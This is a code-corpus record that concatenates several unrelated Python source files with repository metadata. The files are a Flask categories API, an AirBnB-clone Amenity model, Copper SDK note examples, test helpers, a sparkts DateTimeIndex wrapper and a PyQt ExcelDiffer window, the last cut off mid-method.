category = Module('categories', __name__, url_prefix='/categories', no_version=True)
@auth.required(Role.admin)
@auth.required(Role.admin)
def remove_category(category_id):
"""
Remove the category
"""
category = Category.query.get_or_404(category_id)
try:
db.db.session.delete(category)
db.db.session.commit()
except Exception as e:
db.db.session.rollback()
print(e)
raise CategoryException("Could not remove category from database")
tmp = category.to_dict()
return(json_util.dumps(tmp))
@auth.required(Role.admin)
category.add_url_rule('', view_func=get_categories, methods=['GET'])
category.add_url_rule('', view_func=add_category, methods=['POST'])
category.add_url_rule('/<string:category_id>', view_func=get_category, methods=['GET'])
category.add_url_rule('/<string:category_id>', view_func=edit_category, methods=['PUT'])
category.add_url_rule('/<string:category_id>', view_func=remove_category, methods=['DELETE'])
| 29.056738 | 93 | 0.742006 | """
Author: Frederik Muller, xmulle20@stud.fit.vutbr.cz
Author: Matej Vido, xvidom00@stud.fit.vutbr.cz
Date: 04/2017
"""
import bcrypt
from flask import request
from bson import json_util, ObjectId
import pymongo
from slugify import slugify
from api import auth, db
from api.module import Module
from api.models.models import Category, CategoryException
from api.role import Role
category = Module('categories', __name__, url_prefix='/categories', no_version=True)
def get_categories():
res = Category.query.all()
categories = []
for category in res:
if category.parent == None:
tmp = category.to_dict()
tmp["children"] = category.children_dict()
categories.append(tmp)
return(json_util.dumps(categories))
@auth.required(Role.admin)
def add_category():
r = request.get_json()
r.pop("products", [])
r.pop("children", [])
parent_dict = r.pop("parent", None)
parent = None
if parent_dict != None:
parent_id = parent_dict.get("id", None)
if parent_id != None:
parent = Category.query.get_or_404(parent_id)
try:
category = Category.from_dict(r)
except Exception as e:
print(e)
raise CategoryException("Could not convert dictionary to Category")
try:
if parent != None:
parent.children.append(category)
category.slug = slugify(category.name, to_lower=True)
db.db.session.add(category)
res = db.db.session.commit()
except Exception as e:
db.db.session.rollback()
print(e)
raise CategoryException("Could not add category to database")
inserted = Category.query.get_or_404(category.id)
category = inserted.to_dict()
category["parent"] = inserted.parent_dict()
return(json_util.dumps(category))
@auth.required(Role.admin)
def remove_category(category_id):
"""
Remove the category
"""
category = Category.query.get_or_404(category_id)
try:
db.db.session.delete(category)
db.db.session.commit()
except Exception as e:
db.db.session.rollback()
print(e)
raise CategoryException("Could not remove category from database")
tmp = category.to_dict()
return(json_util.dumps(tmp))
@auth.required(Role.admin)
def edit_category(category_id):
category_dict = request.get_json()
category = Category.query.get_or_404(category_id)
# check for all fields to be updated
if "name" in category_dict and category_dict["name"]!= "":
category.name = category_dict["name"]
category.slug = slugify(category.name, to_lower=True)
if "description" in category_dict and category_dict["description"] != "":
category.description = category_dict["description"]
if "slug" in category_dict and category_dict["slug"] != "":
category.slug = category_dict["slug"]
if "hidden" in category_dict and category_dict["hidden"] != "":
category.hidden = category_dict["hidden"]
parent_dict = category_dict.get("parent", None)
if parent_dict != None:
parent_id = parent_dict.get("id", None)
if parent_id != None:
parent = Category.query.get(parent_id)
if parent != None:
category.parent = parent
# Update the category and return updated document
try:
db.db.session.commit()
except Exception as e:
db.db.session.rollback()
print(e)
raise CategoryException("Could not edit category")
tmp = category.to_dict()
tmp["parent"] = category.parent_dict()
tmp["children"] = category.children_dict()
tmp["products"] = category.products_dict()
return(json_util.dumps(tmp))
def get_category(category_id):
category = Category.query.get_or_404(category_id)
category_dict = category.to_dict()
category_dict["products"] = category.products_dict()
category_dict["parent"] = category.parent_dict()
category_dict["children"] = category.children_with_products_dict()
return(json_util.dumps(category_dict))
category.add_url_rule('', view_func=get_categories, methods=['GET'])
category.add_url_rule('', view_func=add_category, methods=['POST'])
category.add_url_rule('/<string:category_id>', view_func=get_category, methods=['GET'])
category.add_url_rule('/<string:category_id>', view_func=edit_category, methods=['PUT'])
category.add_url_rule('/<string:category_id>', view_func=remove_category, methods=['DELETE'])
| 2,673 | 0 | 90 |
4cef688f598302dd4fb8215e03856c14259b75f8 | 314 | py | Python | models/amenity.py | jj131204/AirBnB_clone | c07cc6c08c6d20df3fc0551ce36b7aa4b828e051 | [
"MIT"
] | null | null | null | models/amenity.py | jj131204/AirBnB_clone | c07cc6c08c6d20df3fc0551ce36b7aa4b828e051 | [
"MIT"
] | null | null | null | models/amenity.py | jj131204/AirBnB_clone | c07cc6c08c6d20df3fc0551ce36b7aa4b828e051 | [
"MIT"
] | 1 | 2021-07-07T21:37:54.000Z | 2021-07-07T21:37:54.000Z | #!/usr/bin/python3
""" Amenity module """
from models.base_model import BaseModel
class Amenity(BaseModel):
""" Amenity class implementation """
name = ""
def __init__(self, *args, **kwargs):
""" Initialize in parent class """
super().__init__(self, *args, **kwargs)
| 20.933333 | 48 | 0.595541 | #!/usr/bin/python3
""" Amenity module """
from models.base_model import BaseModel
class Amenity(BaseModel):
""" Amenity class implementation """
name = ""
def __init__(self, *args, **kwargs):
""" Initialize in parent class """
super().__init__(self, *args, **kwargs)
| 0 | 0 | 0 |
90378822fa36a0f7b05207caf56d8e08472ffb30 | 2,839 | py | Python | runner/notes/task.py | makeshmakesh/copper-sdk | c938adb39737822d0bfe17c052ca43898eb2a1c3 | [
"MIT"
] | null | null | null | runner/notes/task.py | makeshmakesh/copper-sdk | c938adb39737822d0bfe17c052ca43898eb2a1c3 | [
"MIT"
] | 1 | 2021-04-15T00:10:50.000Z | 2021-04-15T00:10:50.000Z | runner/notes/task.py | makeshmakesh/copper-sdk | c938adb39737822d0bfe17c052ca43898eb2a1c3 | [
"MIT"
] | 4 | 2021-01-07T05:30:49.000Z | 2021-09-13T08:08:54.000Z | from copper_sdk.notes import NoteTarget
import names_generator
import json
import shared_procs
def create_task_note(copper_client, task_id, user_id):
"""Create a note for a Task
Attributes:
copper_client (copper_sdk.copper):
The CopperSDK client.
task_id (str):
The Id for the Task.
Returns:
The new note.
"""
notes = copper_client.notes()
target = NoteTarget.Task
name = names_generator.generate_name(style="capital")
content = f"{name} greets you from Python"
return notes.push(target, task_id, content, user_id)
def get_task_notes(copper_client, task_id):
"""Get notes of a Task.
Attributes:
copper_client (copper_sdk.copper):
The CopperSDK client.
task_id (str):
The Id for the Task.
Returns:
All notes for a Task.
"""
notes = copper_client.notes()
target = NoteTarget.Task
return notes.get(target, task_id)
def create_task_note_old(copper_client, task_id):
"""Create a note for a Task (old method)
Attributes:
copper_client (copper_sdk.copper):
The CopperSDK client.
task_id (str):
The Id for the Task.
Returns:
The new note.
"""
return copper_client.tasks().pull_notes(task_id)
def get_task_notes_old(copper_client, task_id):
"""Get notes of a Task (old method).
Attributes:
copper_client (copper_sdk.copper):
The CopperSDK client.
task_id (str):
The Id for the Task.
Returns:
All notes for a Task.
"""
name = names_generator.generate_name(style="capital")
content = f"{name} greets you from Python"
return copper_client.tasks().push_note(task_id, content)
def run_old(copper_client, config):
"""Old example on upload and download task notes.
This uses the notes fns of `copper_sdk.Task`.
"""
print("Old example on pushing Task Notes")
task_id = config["TASK_ID"]
print("Creating note for Task Id", task_id)
new_task_note = create_task_note_old(copper_client, task_id)
print("Note:", json.dumps(new_task_note))
shared_procs.wait()
print("Getting all notes for Task Id", task_id)
task_notes = get_task_notes_old(copper_client, task_id)
print(json.dumps(task_notes))
| 25.123894 | 69 | 0.659035 | from copper_sdk.notes import NoteTarget
import names_generator
import json
import shared_procs
def create_task_note(copper_client, task_id, user_id):
"""Create a note for a Task
Attributes:
copper_client (copper_sdk.copper):
The CopperSDK client.
task_id (str):
The Id for the Task.
Returns:
The new note.
"""
notes = copper_client.notes()
target = NoteTarget.Task
name = names_generator.generate_name(style="capital")
content = f"{name} greets you from Python"
return notes.push(target, task_id, content, user_id)
def get_task_notes(copper_client, task_id):
"""Get notes of a Task.
Attributes:
copper_client (copper_sdk.copper):
The CopperSDK client.
task_id (str):
The Id for the Task.
Returns:
All notes for a Task.
"""
notes = copper_client.notes()
target = NoteTarget.Task
return notes.get(target, task_id)
def run(copper_client, config):
print("Running Task Notes examples")
task_id = config["TASK_ID"]
user_id = int(config["USER_ID"])
print("Creating note for Task Id", task_id)
new_task_note = create_task_note(copper_client, task_id, user_id)
print("Note:", json.dumps(new_task_note))
shared_procs.wait()
print("Getting all notes for Task Id", task_id)
task_notes = get_task_notes(copper_client, task_id)
print(json.dumps(task_notes))
def create_task_note_old(copper_client, task_id):
"""Create a note for a Task (old method)
Attributes:
copper_client (copper_sdk.copper):
The CopperSDK client.
task_id (str):
The Id for the Task.
Returns:
The new note.
"""
return copper_client.tasks().pull_notes(task_id)
def get_task_notes_old(copper_client, task_id):
"""Get notes of a Task (old method).
Attributes:
copper_client (copper_sdk.copper):
The CopperSDK client.
task_id (str):
The Id for the Task.
Returns:
All notes for a Task.
"""
name = names_generator.generate_name(style="capital")
content = f"{name} greets you from Python"
return copper_client.tasks().push_note(task_id, content)
def run_old(copper_client, config):
"""Old example on upload and download task notes.
This uses the notes fns of `copper_sdk.Task`.
"""
print("Old example on pushing Task Notes")
task_id = config["TASK_ID"]
print("Creating note for Task Id", task_id)
new_task_note = create_task_note_old(copper_client, task_id)
print("Note:", json.dumps(new_task_note))
shared_procs.wait()
print("Getting all notes for Task Id", task_id)
task_notes = get_task_notes_old(copper_client, task_id)
print(json.dumps(task_notes))
| 453 | 0 | 23 |
224035c0366a11ebad1bfd43ff365d8376f86e1c | 328 | py | Python | editquality/codegen/tests/test_generate.py | paulkernfeld/editquality | 029f21278d89d6e50b0eac7b39d8355f8e4686f4 | [
"MIT"
] | 18 | 2019-03-13T23:26:07.000Z | 2021-12-31T00:57:16.000Z | editquality/codegen/tests/test_generate.py | paulkernfeld/editquality | 029f21278d89d6e50b0eac7b39d8355f8e4686f4 | [
"MIT"
] | 98 | 2015-12-13T12:18:24.000Z | 2018-08-07T21:10:46.000Z | editquality/codegen/tests/test_generate.py | paulkernfeld/editquality | 029f21278d89d6e50b0eac7b39d8355f8e4686f4 | [
"MIT"
] | 17 | 2015-09-29T20:52:12.000Z | 2018-08-20T11:33:30.000Z | import os.path
from .. import generate
TEST_PATH = os.path.dirname(__file__)
| 17.263158 | 59 | 0.594512 | import os.path
from .. import generate
TEST_PATH = os.path.dirname(__file__)
def test_generate_params():
params = {
'foo': 'abc',
'bar': 'def',
}
template = "{{ foo }}{{ bar }}"
expected = "abcdef\n"
actual = generate.generate(params, TEST_PATH, template)
assert expected == actual
| 224 | 0 | 23 |
1419fdc8d5e49e33480adbbeae6baecc459e36d8 | 2,477 | py | Python | test/cli_test/base.py | nprint/nPrintML | 69e56036fd7ab6b050cbe81b31309c06f166f0f2 | [
"Apache-2.0"
] | 13 | 2020-11-04T14:57:12.000Z | 2021-11-18T08:50:00.000Z | test/cli_test/base.py | nprint/nPrintML | 69e56036fd7ab6b050cbe81b31309c06f166f0f2 | [
"Apache-2.0"
] | 60 | 2020-10-22T16:08:14.000Z | 2021-12-14T23:00:36.000Z | test/cli_test/base.py | nprint/nprintml | 69e56036fd7ab6b050cbe81b31309c06f166f0f2 | [
"Apache-2.0"
] | 1 | 2021-12-16T01:10:18.000Z | 2021-12-16T01:10:18.000Z | import contextlib
import functools
import io
import pathlib
import sys
import typing
import unittest
from nprintml import cli
from test.base import mktestdir
TEST_ROOT = pathlib.Path(__file__).parent.parent
TEST_DATA = TEST_ROOT / 'data'
def testdir(func):
"""Decorator to wrap given function such that a temporary directory
is created and destroyed for each invocation.
"""
@functools.wraps(func)
return wrapper
| 27.21978 | 82 | 0.603553 | import contextlib
import functools
import io
import pathlib
import sys
import typing
import unittest
from nprintml import cli
from test.base import mktestdir
TEST_ROOT = pathlib.Path(__file__).parent.parent
TEST_DATA = TEST_ROOT / 'data'
def testdir(func):
"""Decorator to wrap given function such that a temporary directory
is created and destroyed for each invocation.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
with mktestdir(f'nprintml.{func.__module__}.{func.__name__}.') as tempdir:
return func(*args, tempdir, **kwargs)
return wrapper
class TeeIO:
def __init__(self, *targets):
self.targets = targets
def write(self, content):
for target in self.targets:
target.write(content)
class CLITestCase(unittest.TestCase):
class ExecutionResult(typing.NamedTuple):
stdout: typing.Optional[str]
stderr: typing.Optional[str]
code: typing.Optional[int]
@classmethod
def from_stringio(cls, stdout, stderr, code):
outputs = (None if output is None else output.getvalue()
for output in (stdout, stderr))
return cls(*outputs, code)
class CommandError(Exception):
def __init__(self, code, result):
super().__init__(code, result.stdout, result.stderr)
self.code = code
self.result = result
def try_execute(self, *argv, raise_exc=True, stdout=False, stderr=False):
with contextlib.ExitStack() as stack:
outputs = []
for (should_redirect, redirect_manager, output0) in (
(stdout, contextlib.redirect_stdout, sys.stdout),
(stderr, contextlib.redirect_stderr, sys.stderr),
):
if should_redirect:
output1 = io.StringIO()
stack.enter_context(redirect_manager(TeeIO(output0, output1)))
else:
output1 = None
outputs.append(output1)
code = None
try:
cli.execute(map(str, argv))
except SystemExit as exc:
code = exc.code
if raise_exc and code > 0:
result = self.ExecutionResult.from_stringio(*outputs, code)
raise self.CommandError(exc.code, result) from exc
return self.ExecutionResult.from_stringio(*outputs, code)
| 1,597 | 310 | 126 |
490e5c475bc83d2f42ea4de089689f8d1276f355 | 5,941 | py | Python | python/sparkts/datetimeindex.py | ypramos1986/spark-timeseries | e81bebd2d158477c077a5e35d048f4c90b991154 | [
"Apache-2.0"
] | 1 | 2018-01-30T18:32:07.000Z | 2018-01-30T18:32:07.000Z | python/sparkts/datetimeindex.py | ypramos1986/spark-timeseries | e81bebd2d158477c077a5e35d048f4c90b991154 | [
"Apache-2.0"
] | null | null | null | python/sparkts/datetimeindex.py | ypramos1986/spark-timeseries | e81bebd2d158477c077a5e35d048f4c90b991154 | [
"Apache-2.0"
] | null | null | null | from py4j.java_gateway import java_import
from .utils import datetime_to_nanos
import numpy as np
import pandas as pd
class DateTimeIndex(object):
"""
A DateTimeIndex maintains a bi-directional mapping between integers and an ordered collection of
date-times. Multiple date-times may correspond to the same integer, implying multiple samples
at the same date-time.
To avoid confusion between the meaning of "index" as it appears in "DateTimeIndex" and "index"
as a location in an array, in the context of this class, we use "location", or "loc", to refer
to the latter.
"""
def __len__(self):
"""Returns the number of timestamps included in the index."""
return self._jdt_index.size()
def _zdt_to_nanos(self, zdt):
"""Extracts nanoseconds from a ZonedDateTime"""
instant = zdt.toInstant()
return instant.getNano() + instant.getEpochSecond() * 1000000000
def first(self):
"""Returns the earliest timestamp in the index, as a Pandas Timestamp."""
return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.first()))
def last(self):
"""Returns the latest timestamp in the index, as a Pandas Timestamp."""
return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.last()))
def datetime_at_loc(self, loc):
"""Returns the timestamp at the given integer location as a Pandas Timestamp."""
return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.dateTimeAtLoc(loc)))
def islice(self, start, end):
"""
Returns a new DateTimeIndex, containing a subslice of the timestamps in this index,
as specified by the given integer start and end locations.
Parameters
----------
start : int
The location of the start of the range, inclusive.
end : int
The location of the end of the range, exclusive.
"""
jdt_index = self._jdt_index.islice(start, end)
return DateTimeIndex(jdt_index=jdt_index)
def to_pandas_index(self):
"""Returns a pandas.DatetimeIndex representing the same date-times"""
# TODO: we can probably speed this up for uniform indices
arr = self._jdt_index.toNanosArray()
return pd.DatetimeIndex(arr)
class DayFrequency(_Frequency):
"""
A frequency that can be used for a uniform DateTimeIndex, where the period is given in days.
"""
class HourFrequency(_Frequency):
"""
A frequency that can be used for a uniform DateTimeIndex, where the period is given in hours.
"""
class BusinessDayFrequency(object):
"""
A frequency that can be used for a uniform DateTimeIndex, where the period is given in
business days. The first day of the business week is specified where Monday=1, Tuesday=2,
and so on.
"""
def uniform(start, end=None, periods=None, freq=None, sc=None):
"""
Instantiates a uniform DateTimeIndex.
Either end or periods must be specified.
Parameters
----------
start : string, long (nanos from epoch), or Pandas Timestamp
end : string, long (nanos from epoch), or Pandas Timestamp
periods : int
freq : a frequency object
sc : SparkContext
"""
dtmodule = sc._jvm.com.cloudera.sparkts.__getattr__('DateTimeIndex$').__getattr__('MODULE$')
if freq is None:
raise ValueError("Missing frequency")
elif end is None and periods == None:
raise ValueError("Need an end date or number of periods")
elif end is not None:
return DateTimeIndex(dtmodule.uniformFromInterval( \
datetime_to_nanos(start), datetime_to_nanos(end), freq._jfreq))
else:
return DateTimeIndex(dtmodule.uniform( \
datetime_to_nanos(start), periods, freq._jfreq))
def irregular(timestamps, sc):
"""
Instantiates an irregular DateTimeIndex.
Parameters
----------
timestamps : a Pandas DateTimeIndex, or an array of strings, longs (nanos from epoch), Pandas
Timestamps
sc : SparkContext
"""
dtmodule = sc._jvm.com.cloudera.sparkts.__getattr__('DateTimeIndex$').__getattr__('MODULE$')
arr = sc._gateway.new_array(sc._jvm.long, len(timestamps))
for i in xrange(len(timestamps)):
arr[i] = datetime_to_nanos(timestamps[i])
return DateTimeIndex(dtmodule.irregular(arr))
| 34.74269 | 101 | 0.66504 | from py4j.java_gateway import java_import
from .utils import datetime_to_nanos
import numpy as np
import pandas as pd
class DateTimeIndex(object):
"""
A DateTimeIndex maintains a bi-directional mapping between integers and an ordered collection of
date-times. Multiple date-times may correspond to the same integer, implying multiple samples
at the same date-time.
To avoid confusion between the meaning of "index" as it appears in "DateTimeIndex" and "index"
as a location in an array, in the context of this class, we use "location", or "loc", to refer
to the latter.
"""
def __init__(self, jdt_index):
self._jdt_index = jdt_index
def __len__(self):
"""Returns the number of timestamps included in the index."""
return self._jdt_index.size()
def _zdt_to_nanos(self, zdt):
"""Extracts nanoseconds from a ZonedDateTime"""
instant = zdt.toInstant()
return instant.getNano() + instant.getEpochSecond() * 1000000000
def first(self):
"""Returns the earliest timestamp in the index, as a Pandas Timestamp."""
return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.first()))
def last(self):
"""Returns the latest timestamp in the index, as a Pandas Timestamp."""
return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.last()))
def datetime_at_loc(self, loc):
"""Returns the timestamp at the given integer location as a Pandas Timestamp."""
return pd.Timestamp(self._zdt_to_nanos(self._jdt_index.dateTimeAtLoc(loc)))
def __getitem__(self, val):
# TODO: throw an error if the step size is defined
if isinstance(val, slice):
start = datetime_to_nanos(val.start)
stop = datetime_to_nanos(val.stop)
jdt_index = self._jdt_index.slice(start, stop)
return DateTimeIndex(jdt_index)
else:
return self._jdt_index.locAtDateTime(datetime_to_nanos(val))
def islice(self, start, end):
"""
Returns a new DateTimeIndex, containing a subslice of the timestamps in this index,
as specified by the given integer start and end locations.
Parameters
----------
start : int
The location of the start of the range, inclusive.
end : int
The location of the end of the range, exclusive.
"""
jdt_index = self._jdt_index.islice(start, end)
return DateTimeIndex(jdt_index=jdt_index)
def to_pandas_index(self):
"""Returns a pandas.DatetimeIndex representing the same date-times"""
# TODO: we can probably speed this up for uniform indices
arr = self._jdt_index.toNanosArray()
return pd.DatetimeIndex(arr)
def __eq__(self, other):
return self._jdt_index.equals(other._jdt_index)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return self._jdt_index.toString()
class _Frequency(object):
def __eq__(self, other):
return self._jfreq.equals(other._jfreq)
def __ne__(self, other):
return not self.__eq__(other)
class DayFrequency(_Frequency):
"""
A frequency that can be used for a uniform DateTimeIndex, where the period is given in days.
"""
def __init__(self, days, sc):
self._jfreq = sc._jvm.com.cloudera.sparkts.DayFrequency(days)
def days(self):
return self._jfreq.days()
class HourFrequency(_Frequency):
"""
A frequency that can be used for a uniform DateTimeIndex, where the period is given in hours.
"""
def __init__(self, hours, sc):
self._jfreq = sc._jvm.com.cloudera.sparkts.HourFrequency(hours)
def hours(self):
return self._jfreq.hours()
class BusinessDayFrequency(object):
"""
A frequency that can be used for a uniform DateTimeIndex, where the period is given in
business days. The first day of the business week is specified where Monday=1, Tuesday=2,
and so on.
"""
def __init__(self, bdays, firstDayOfWeek, sc):
self._jfreq = sc._jvm.com.cloudera.sparkts.BusinessDayFrequency(bdays, firstDayOfWeek)
def __eq__(self, other):
return self._jfreq.equals(other._jfreq)
def __ne__(self, other):
return not self.__eq__(other)
def days(self):
return self._jfreq.days()
def uniform(start, end=None, periods=None, freq=None, sc=None):
"""
Instantiates a uniform DateTimeIndex.
Either end or periods must be specified.
Parameters
----------
start : string, long (nanos from epoch), or Pandas Timestamp
end : string, long (nanos from epoch), or Pandas Timestamp
periods : int
freq : a frequency object
sc : SparkContext
"""
dtmodule = sc._jvm.com.cloudera.sparkts.__getattr__('DateTimeIndex$').__getattr__('MODULE$')
if freq is None:
raise ValueError("Missing frequency")
elif end is None and periods == None:
raise ValueError("Need an end date or number of periods")
elif end is not None:
return DateTimeIndex(dtmodule.uniformFromInterval( \
datetime_to_nanos(start), datetime_to_nanos(end), freq._jfreq))
else:
return DateTimeIndex(dtmodule.uniform( \
datetime_to_nanos(start), periods, freq._jfreq))
def irregular(timestamps, sc):
"""
Instantiates an irregular DateTimeIndex.
Parameters
----------
timestamps : a Pandas DateTimeIndex, or an array of strings, longs (nanos from epoch), Pandas
Timestamps
sc : SparkContext
"""
dtmodule = sc._jvm.com.cloudera.sparkts.__getattr__('DateTimeIndex$').__getattr__('MODULE$')
arr = sc._gateway.new_array(sc._jvm.long, len(timestamps))
for i in xrange(len(timestamps)):
arr[i] = datetime_to_nanos(timestamps[i])
return DateTimeIndex(dtmodule.irregular(arr))
| 1,120 | 4 | 429 |
c1e20d70880881a9bc4a9d9ab9bb1e131bcbe8a5 | 22,838 | py | Python | MainWindow.py | Linzecong/ExcelDiffer | 97ee053cf29f70e401e9ddc65fc2f79d5da2d923 | [
"Apache-2.0"
] | 20 | 2019-03-04T11:11:30.000Z | 2022-03-14T06:52:46.000Z | MainWindow.py | hubuyaolian/ExcelDiffer-1 | 97ee053cf29f70e401e9ddc65fc2f79d5da2d923 | [
"Apache-2.0"
] | 3 | 2019-03-04T11:12:44.000Z | 2022-01-12T18:06:15.000Z | MainWindow.py | hubuyaolian/ExcelDiffer-1 | 97ee053cf29f70e401e9ddc65fc2f79d5da2d923 | [
"Apache-2.0"
] | 8 | 2019-03-28T11:07:39.000Z | 2022-01-03T19:45:52.000Z | #-*- codingg:utf8 -*-
from PyQt5.QtWidgets import QMainWindow,QFontDialog, QApplication,QMenu,QAction,QFileDialog,QDockWidget,QMessageBox,QDesktopWidget,QTableWidget
from PyQt5.QtGui import QIcon,QFont,QKeySequence
from PyQt5.QtCore import Qt,QSettings,QThread,pyqtSignal
from ViewWidget import ViewWidget
from DiffWidget import RowDiffWidget,CellDiffWidget,ColDiffWidget
from ChangeColorWidget import ChangeColorWidget
from Model import MyXlsx
from Algorithm import MyAlg
import sys,math,hashlib
if __name__=="__main__":
app = QApplication(sys.argv)
main = MainWindow()
main.setWindowIcon(QIcon("icon/opennew.ico"))
main.show()
sys.exit(app.exec_()) | 43.500952 | 193 | 0.645853 | #-*- codingg:utf8 -*-
from PyQt5.QtWidgets import QMainWindow,QFontDialog, QApplication,QMenu,QAction,QFileDialog,QDockWidget,QMessageBox,QDesktopWidget,QTableWidget
from PyQt5.QtGui import QIcon,QFont,QKeySequence
from PyQt5.QtCore import Qt,QSettings,QThread,pyqtSignal
from ViewWidget import ViewWidget
from DiffWidget import RowDiffWidget,CellDiffWidget,ColDiffWidget
from ChangeColorWidget import ChangeColorWidget
from Model import MyXlsx
from Algorithm import MyAlg
import sys,math,hashlib
class Thread(QThread):
done = pyqtSignal(dict)
def __init__(self,Window,name="###"):
super().__init__()
self.window = Window
self.name = name
def run(self):
self.SheetDiff = self.window.Alg[self.name].getSheetdiff()
self.SheetDiff["diffname"]=self.name
self.done.emit(self.SheetDiff)
class OpenFileThread(QThread):
def __init__(self,file):
super().__init__()
self.file = file
def run(self):
self.Xlrd = MyXlsx(self.file)
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow,self).__init__()
self.isanaing = False #是否在分析
self.setWindowTitle("ExcelDiffer")
self.qss = True
self.IsAna = False
self.currentFont = self.font()
self.initFont = self.font()
self.ps = self.initFont.pointSize()
self.CentralWidget = ViewWidget()
self.setCentralWidget(self.CentralWidget)
self.RowDiffWidget = RowDiffWidget()
self.RowDiffDock = QDockWidget("行改动") # 实例化dockwidget类
self.RowDiffDock.setWidget(self.RowDiffWidget) # 带入的参数为一个QWidget窗体实例,将该窗体放入dock中
self.RowDiffDock.setFeatures(QDockWidget.AllDockWidgetFeatures) # 设置dockwidget的各类属性
self.RowDiffDock.setAllowedAreas(Qt.AllDockWidgetAreas)
self.RowDiffDock.setObjectName("rowdiff")
self.RowDiffWidget.RowAddListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(1,"add_row",self.RowDiffWidget.RowAddListWidget.currentRow()))
self.RowDiffWidget.RowDelListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"del_row",self.RowDiffWidget.RowDelListWidget.currentRow()))
self.RowDiffWidget.RowExcListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"row_exchange",self.RowDiffWidget.RowExcListWidget.currentRow()))
self.addDockWidget(Qt.LeftDockWidgetArea, self.RowDiffDock)
self.ColDiffWidget = ColDiffWidget()
self.ColDiffDock = QDockWidget("列改动") # 实例化dockwidget类
self.ColDiffDock.setWidget(self.ColDiffWidget) # 带入的参数为一个QWidget窗体实例,将该窗体放入dock中
self.ColDiffDock.setFeatures(QDockWidget.AllDockWidgetFeatures) # 设置dockwidget的各类属性
self.ColDiffDock.setAllowedAreas(Qt.AllDockWidgetAreas)
self.ColDiffDock.setObjectName("coldiff")
self.ColDiffWidget.ColAddListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(1,"add_col",self.ColDiffWidget.ColAddListWidget.currentRow()))
self.ColDiffWidget.ColDelListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"del_col",self.ColDiffWidget.ColDelListWidget.currentRow()))
self.ColDiffWidget.ColExcListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"col_exchange",self.ColDiffWidget.ColExcListWidget.currentRow()))
self.addDockWidget(Qt.LeftDockWidgetArea, self.ColDiffDock)
self.CellDiffWidget = CellDiffWidget()
self.CellDiffDock = QDockWidget("格改动") # 实例化dockwidget类
self.CellDiffDock.setWidget(self.CellDiffWidget) # 带入的参数为一个QWidget窗体实例,将该窗体放入dock中
self.CellDiffDock.setFeatures(QDockWidget.AllDockWidgetFeatures) # 设置dockwidget的各类属性
self.CellDiffDock.setAllowedAreas(Qt.AllDockWidgetAreas)
self.CellDiffDock.setObjectName("celldiff")
self.CellDiffWidget.CellDiffListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"change_cell",self.CellDiffWidget.CellDiffListWidget.currentRow()))
self.CellDiffWidget.MergeAddDiffListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(1,"new_merge",self.CellDiffWidget.MergeAddDiffListWidget.currentRow()))
self.CellDiffWidget.MergeDelDiffListWidget.clicked.connect(lambda:self.CentralWidget.setHighLight(0,"del_merge",self.CellDiffWidget.MergeDelDiffListWidget.currentRow()))
self.addDockWidget(Qt.RightDockWidgetArea, self.CellDiffDock)
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
self.WinSettings = QSettings("ExcelDiffer", "ExcelDifferInit");
self.WinSettings.setValue("geometry", self.saveGeometry());
self.WinSettings.setValue("windowState", self.saveState());
self.ColorSettings = QSettings("ExcelDiffer", "Color");
if self.ColorSettings.contains("hightlight") == False:
self.ColorSettings.setValue("hightlight", "#909399");
self.ColorSettings.setValue("background", "#FFFFFF");
self.ColorSettings.setValue("exchange", "#EBEEF5");
self.ColorSettings.setValue("add", "#409EFF");
self.ColorSettings.setValue("delcolor", "#F56C6C");
self.ColorSettings.setValue("change", "#E6A23C");
self.bar = self.statusBar()
self.initAction()
self.initMenu()
self.initToolBar()
self.Alg = {}
self.Alg["###"] = MyAlg()
def restoreToWinSetting(self):
reply = QMessageBox.warning(self, "确定恢复上次保存的窗口布局吗?", "确定恢复上次保存的窗口布局吗?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No);
if reply == QMessageBox.No:
return
try:
self.WinSettings = QSettings("ExcelDiffer", "ExcelDiffer");
self.restoreGeometry(self.WinSettings.value("geometry"));
self.restoreState(self.WinSettings.value("windowState"));
except:
pass
def saveToWinSetting(self):
self.WinSettings = QSettings("ExcelDiffer", "ExcelDiffer");
self.WinSettings.setValue("geometry", self.saveGeometry());
self.WinSettings.setValue("windowState", self.saveState());
def restoreToWinInit(self):
reply = QMessageBox.warning(self, "确定恢复默认吗?", "确认将窗口恢复默认吗?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No);
if reply == QMessageBox.No:
return
self.WinSettings = QSettings("ExcelDiffer", "ExcelDifferInit");
self.restoreGeometry(self.WinSettings.value("geometry"));
self.restoreState(self.WinSettings.value("windowState"));
def chooseColor(self):
self.CW = ChangeColorWidget()
self.CW.exec_()
def restoreToColorInit(self):
reply = QMessageBox.warning(self, "确定恢复默认颜色吗?", "确定恢复默认颜色吗?", QMessageBox.Yes | QMessageBox.No, QMessageBox.No);
if reply == QMessageBox.No:
return
self.ColorSettings = QSettings("ExcelDiffer", "Color");
self.ColorSettings.setValue("hightlight", "#909399");
self.ColorSettings.setValue("background", "#FFFFFF");
self.ColorSettings.setValue("exchange", "#EBEEF5");
self.ColorSettings.setValue("add", "#409EFF");
self.ColorSettings.setValue("delcolor", "#F56C6C");
self.ColorSettings.setValue("change", "#E6A23C");
QMessageBox.information(self, "提示", "恢复成功,请重新比较", QMessageBox.Yes);
def initAction(self):
self.anaAct = QAction(QIcon("icon/ana.png"),'开始比较', self)
self.anaAct.setShortcut('Ctrl+A')
self.anaAct.setStatusTip("开始比较")
self.anaAct.triggered.connect(self.beginAna)
self.openOldAct = QAction(QIcon("icon/openold.ico"),'打开旧文件', self)
